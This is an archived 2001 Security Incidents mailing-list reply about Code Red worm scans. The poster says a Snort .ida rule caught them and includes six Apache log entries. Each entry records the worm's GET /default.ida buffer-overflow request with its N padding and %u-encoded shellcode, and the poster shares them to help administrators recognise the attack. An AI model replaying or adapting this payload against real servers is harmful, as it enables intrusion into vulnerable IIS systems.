Security Incidents mailing list archives
Re: .ida Intrusion Attempt
From: bugtraq <bugtraq () cgisecurity net>
Date: Thu, 19 Jul 2001 15:37:55 +0000 (GMT)
I'm running 1.8p1 and the .ida rule picked up all visits from the code red worm which we started seeing this afternoon without issue. Below is the complete packet if your interested.
I am including 6 log entries from my apache system I got within the last hour. Maybe it will help someone see what it may look like in there logs. 205.238.121.1 - - [19/Jul/2001:11:39:32 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6! 8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%! 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 216.20.237.252 - - [19/Jul/2001:13:23:34 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u! 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00! 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 24.1.20.196 - - [19/Jul/2001:14:10:48 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u685! ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5! b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 216.232.65.56 - - [19/Jul/2001:14:37:27 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6! 8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%! 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 24.219.125.0 - - [19/Jul/2001:14:38:51 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u68! %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u! 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 207.212.91.163 - - [19/Jul/2001:14:42:42 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u! 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00! 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" Just to give you a idea of how many systems are effected notice the times between scans. - zenomorph ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- RE: .ida Intrusion Attempt Keith.Morgan (Jul 19)
- <Possible follow-ups>
- RE: .ida Intrusion Attempt Tulchinskiy, Sasha (Jul 19)
- Re: .ida Intrusion Attempt Sebastian Ip (Jul 19)
- Re: .ida Intrusion Attempt Kheos ml (Jul 19)
- Re: .ida Intrusion Attempt Sebastian Ip (Jul 19)
- RE: .ida Intrusion Attempt Yom, Francis (Jul 19)
- Re: .ida Intrusion Attempt Dr SuSE (Jul 19)
- Re: .ida Intrusion Attempt bugtraq (Jul 19)
- RE: .ida Intrusion Attempt Colby Rice (Jul 19)
- RE: .ida Intrusion Attempt Tim Winders (Jul 19)
- .ida Intrusion Attempt Joe Smith (Jul 19)
- Re: .ida Intrusion Attempt Martin Roesch (Jul 19)
- Re: .ida Intrusion Attempt Joe Smith (Jul 19)
- Re: .ida Intrusion Attempt Martin Roesch (Jul 19)
- RE: .ida Intrusion Attempt Ulrich Keil (Jul 19)
- Re: .ida Intrusion Attempt Russell Fulton (Jul 19)
- Re: .ida Intrusion Attempt Stuart Staniford (Jul 19)
- Re: .ida Intrusion Attempt E. Larry Lidz (Jul 20)
- Re: .ida Intrusion Attempt Kyle R Maxwell (Jul 20)
- Re: .ida Intrusion Attempt Stuart Staniford (Jul 19)